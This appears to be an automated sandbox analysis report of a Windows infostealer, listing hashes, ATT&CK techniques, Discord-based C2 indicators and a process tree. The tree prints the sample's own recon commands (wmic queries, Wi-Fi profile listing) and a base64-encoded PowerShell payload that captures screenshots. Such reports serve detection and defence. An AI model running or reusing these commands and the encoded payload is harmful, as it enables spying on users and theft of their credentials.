14bea45a91e363227b7da42c601342f681e18c121e73d037781b877107ad6d93

General

Target

2024-09-05_50ce0fafe706202dd0c7e16dda7d944f_poet-rat_snatch.exe
Size

9.6MB
MD5

50ce0fafe706202dd0c7e16dda7d944f
SHA1

fe793c1147c6353fa9e23a414859377373f15568
SHA256

14bea45a91e363227b7da42c601342f681e18c121e73d037781b877107ad6d93
SHA512

1dd6391a40baf16206b1dfd4cd6b83e194e642182adc183d3cff18ff1edad1541eac18d814cb2264619f5752ceef4211095d1dbc8941db3cde6a84119d3e6b87
SSDEEP

196608:thWVIBVKULThlN1BZWjdEi3FyfzEhvg5hGmrx11/AkfCaYlZQgslbyVmZDDEE:bW36p

Score

9^/10

credential_access defense_evasion discovery persistence privilege_escalation spyware stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

1 discord.com
10 discord.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

6 ip-api.com
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

flow	ioc
1	discord.com
10	discord.com

flow	ioc
6	ip-api.com

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
discovery

Wi-Fi Discovery
T1016.002

Processes:

netsh.exe

pid process

4352 netsh.exe
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

wmic.exe

pid process

4596 wmic.exe
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description flow ioc

HTTP User-Agent header 8 Go-http-client/1.1

pid	process
4352	netsh.exe

pid	process
4596	wmic.exe

description	flow	ioc
HTTP User-Agent header	8	Go-http-client/1.1

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

2024-09-05_50ce0fafe706202dd0c7e16dda7d944f_poet-rat_snatch.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-09-05_50ce0fafe706202dd0c7e16dda7d944f_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-09-05_50ce0fafe706202dd0c7e16dda7d944f_poet-rat_snatch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	2024-09-05_50ce0fafe706202dd0c7e16dda7d944f_poet-rat_snatch.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

1280 powershell.exe
1280 powershell.exe

pid	process
1280	powershell.exe
1280	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

wmic.exewmic.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	1392	wmic.exe
Token: SeSecurityPrivilege	1392	wmic.exe
Token: SeTakeOwnershipPrivilege	1392	wmic.exe
Token: SeLoadDriverPrivilege	1392	wmic.exe
Token: SeSystemProfilePrivilege	1392	wmic.exe
Token: SeSystemtimePrivilege	1392	wmic.exe
Token: SeProfSingleProcessPrivilege	1392	wmic.exe
Token: SeIncBasePriorityPrivilege	1392	wmic.exe
Token: SeCreatePagefilePrivilege	1392	wmic.exe
Token: SeBackupPrivilege	1392	wmic.exe
Token: SeRestorePrivilege	1392	wmic.exe
Token: SeShutdownPrivilege	1392	wmic.exe
Token: SeDebugPrivilege	1392	wmic.exe
Token: SeSystemEnvironmentPrivilege	1392	wmic.exe
Token: SeRemoteShutdownPrivilege	1392	wmic.exe
Token: SeUndockPrivilege	1392	wmic.exe
Token: SeManageVolumePrivilege	1392	wmic.exe
Token: 33	1392	wmic.exe
Token: 34	1392	wmic.exe
Token: 35	1392	wmic.exe
Token: 36	1392	wmic.exe
Token: SeIncreaseQuotaPrivilege	1392	wmic.exe
Token: SeSecurityPrivilege	1392	wmic.exe
Token: SeTakeOwnershipPrivilege	1392	wmic.exe
Token: SeLoadDriverPrivilege	1392	wmic.exe
Token: SeSystemProfilePrivilege	1392	wmic.exe
Token: SeSystemtimePrivilege	1392	wmic.exe
Token: SeProfSingleProcessPrivilege	1392	wmic.exe
Token: SeIncBasePriorityPrivilege	1392	wmic.exe
Token: SeCreatePagefilePrivilege	1392	wmic.exe
Token: SeBackupPrivilege	1392	wmic.exe
Token: SeRestorePrivilege	1392	wmic.exe
Token: SeShutdownPrivilege	1392	wmic.exe
Token: SeDebugPrivilege	1392	wmic.exe
Token: SeSystemEnvironmentPrivilege	1392	wmic.exe
Token: SeRemoteShutdownPrivilege	1392	wmic.exe
Token: SeUndockPrivilege	1392	wmic.exe
Token: SeManageVolumePrivilege	1392	wmic.exe
Token: 33	1392	wmic.exe
Token: 34	1392	wmic.exe
Token: 35	1392	wmic.exe
Token: 36	1392	wmic.exe
Token: SeIncreaseQuotaPrivilege	748	wmic.exe
Token: SeSecurityPrivilege	748	wmic.exe
Token: SeTakeOwnershipPrivilege	748	wmic.exe
Token: SeLoadDriverPrivilege	748	wmic.exe
Token: SeSystemProfilePrivilege	748	wmic.exe
Token: SeSystemtimePrivilege	748	wmic.exe
Token: SeProfSingleProcessPrivilege	748	wmic.exe
Token: SeIncBasePriorityPrivilege	748	wmic.exe
Token: SeCreatePagefilePrivilege	748	wmic.exe
Token: SeBackupPrivilege	748	wmic.exe
Token: SeRestorePrivilege	748	wmic.exe
Token: SeShutdownPrivilege	748	wmic.exe
Token: SeDebugPrivilege	748	wmic.exe
Token: SeSystemEnvironmentPrivilege	748	wmic.exe
Token: SeRemoteShutdownPrivilege	748	wmic.exe
Token: SeUndockPrivilege	748	wmic.exe
Token: SeManageVolumePrivilege	748	wmic.exe
Token: 33	748	wmic.exe
Token: 34	748	wmic.exe
Token: 35	748	wmic.exe
Token: 36	748	wmic.exe
Token: SeIncreaseQuotaPrivilege	748	wmic.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

2024-09-05_50ce0fafe706202dd0c7e16dda7d944f_poet-rat_snatch.exepowershell.execsc.exe

description	pid	process	target process
PID 3856 wrote to memory of 1392	3856	2024-09-05_50ce0fafe706202dd0c7e16dda7d944f_poet-rat_snatch.exe	wmic.exe
PID 3856 wrote to memory of 1392	3856	2024-09-05_50ce0fafe706202dd0c7e16dda7d944f_poet-rat_snatch.exe	wmic.exe
PID 3856 wrote to memory of 748	3856	2024-09-05_50ce0fafe706202dd0c7e16dda7d944f_poet-rat_snatch.exe	wmic.exe
PID 3856 wrote to memory of 748	3856	2024-09-05_50ce0fafe706202dd0c7e16dda7d944f_poet-rat_snatch.exe	wmic.exe
PID 3856 wrote to memory of 4596	3856	2024-09-05_50ce0fafe706202dd0c7e16dda7d944f_poet-rat_snatch.exe	wmic.exe
PID 3856 wrote to memory of 4596	3856	2024-09-05_50ce0fafe706202dd0c7e16dda7d944f_poet-rat_snatch.exe	wmic.exe
PID 3856 wrote to memory of 4016	3856	2024-09-05_50ce0fafe706202dd0c7e16dda7d944f_poet-rat_snatch.exe	wmic.exe
PID 3856 wrote to memory of 4016	3856	2024-09-05_50ce0fafe706202dd0c7e16dda7d944f_poet-rat_snatch.exe	wmic.exe
PID 3856 wrote to memory of 4352	3856	2024-09-05_50ce0fafe706202dd0c7e16dda7d944f_poet-rat_snatch.exe	netsh.exe
PID 3856 wrote to memory of 4352	3856	2024-09-05_50ce0fafe706202dd0c7e16dda7d944f_poet-rat_snatch.exe	netsh.exe
PID 3856 wrote to memory of 1280	3856	2024-09-05_50ce0fafe706202dd0c7e16dda7d944f_poet-rat_snatch.exe	powershell.exe
PID 3856 wrote to memory of 1280	3856	2024-09-05_50ce0fafe706202dd0c7e16dda7d944f_poet-rat_snatch.exe	powershell.exe
PID 1280 wrote to memory of 3076	1280	powershell.exe	csc.exe
PID 1280 wrote to memory of 3076	1280	powershell.exe	csc.exe
PID 3076 wrote to memory of 1472	3076	csc.exe	cvtres.exe
PID 3076 wrote to memory of 1472	3076	csc.exe	cvtres.exe

C:\Users\Admin\AppData\Local\Temp\2024-09-05_50ce0fafe706202dd0c7e16dda7d944f_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-09-05_50ce0fafe706202dd0c7e16dda7d944f_poet-rat_snatch.exe"
1⤵
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:3856

C:\Windows\System32\Wbem\wmic.exe
wmic os get Caption
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1392

C:\Windows\System32\Wbem\wmic.exe
wmic cpu get Name
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:748

C:\Windows\System32\Wbem\wmic.exe
wmic path win32_VideoController get name
2⤵
- Detects videocard installed
PID:4596

C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
2⤵
PID:4016

C:\Windows\system32\netsh.exe
netsh wlan show profiles
2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4352

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1280

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pavtybla\pavtybla.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:3076

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDD8F.tmp" "c:\Users\Admin\AppData\Local\Temp\pavtybla\CSCF3400A3189FA4AA0B2FE752FEF7CEDFA.TMP"
4⤵
PID:1472

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Event Triggered Execution

1

T1546

Netsh Helper DLL

1

T1546.007

Privilege Escalation

Event Triggered Execution

1

T1546

Netsh Helper DLL

1

T1546.007

Defense Evasion

Modify Registry

1

T1112

Obfuscated Files or Information

1

T1027

Command Obfuscation

1

T1027.010

Subvert Trust Controls

1

T1553

Install Root Certificate

1

T1553.004

Credential Access

Credentials from Password Stores

1

T1555

Credentials from Web Browsers

1

T1555.003

Unsecured Credentials

4

T1552

Credentials In Files

4

T1552.001

Discovery

Browser Information Discovery

1

T1217

System Information Discovery

1

T1082

System Network Configuration Discovery

1

T1016

Wi-Fi Discovery

1

T1016.002

Lateral Movement

Collection

Data from Local System

3

T1005

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\JCieod8Xr7\Display (1).png
Filesize
205KB

MD5
530d5f7efdd9704497620626e13d9e74

SHA1
77bbd9974dec6c266ea817043e19bb442e00d65b

SHA256
339e036ed9ebb6e29b351b00a0e7df64cd3d25fcf9012a513997642c5e964bde

SHA512
87439e51cb7c7678d7295f578e5a0818d3d1bc027c6cb1311de37aedb2431583c052646571665bf9e6cf91b43f57d6787038e2fd5e41aa15af141c3e91a7ec6f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESDD8F.tmp
Filesize
1KB

MD5
ca7e812d8fffa3ef1d30937c2f4393fa

SHA1
cdfb0fea9c23b47b991faca7d7d155c25e6e14e0

SHA256
3a01bbab205e90304b2c79f448de166740b8c8345ad45a229c10a6929a23be32

SHA512
e1d02108f7881beaffb6e5706a69aa43291806c046d5e2da4c2321e166af18d031ae2b020a0694e2ce7009fd35d16eae299ba04405e8b97610dd8525c95e1093

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bfssmwdw.w3e.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\pavtybla\pavtybla.dll
Filesize
4KB

MD5
4c014b780c469c2acc94ea4bb0692e50

SHA1
8ee0a9cd9442facbad39e1bb3675029ae5781397

SHA256
d686cb1be4884ced2a2934af6d68157cbc8fe553b4dd4c3331511dade8492b6a

SHA512
83346b8de2f5ad4fa509ff0e4f77fde695b1af8bf93bbf629fa3f5015f65d642a114d79268971855a56ecc34e5b2e1a99c8eaf476a3a38562d6e09998e090633

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pavtybla\CSCF3400A3189FA4AA0B2FE752FEF7CEDFA.TMP
Filesize
652B

MD5
29269d928ae43df47f5d10fe2f60dc0d

SHA1
e3c5f36027498759d8773dcf6b761f782a19fa97

SHA256
592d6895c0c2a38419cfcb9c8d21492f3c54279032fbf88cb22033633850dac8

SHA512
630ba3e467fadc89985419786c434f82f90443e95f86f44c2e3047c2c6b183a51c62395fc17c165f59881b518f2f7ae3713f9aca38d768d097e96c185f323e12

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pavtybla\pavtybla.0.cs
Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pavtybla\pavtybla.cmdline
Filesize
607B

MD5
0eba66aa9af6cf45b7983e8b037665e3

SHA1
897d4bfbb1a596486226033e9293f01cbafeb134

SHA256
99629ab3583f515f2e627b5addcb502c63f15a4a8b88ac8c2b6da73ea3746fbc

SHA512
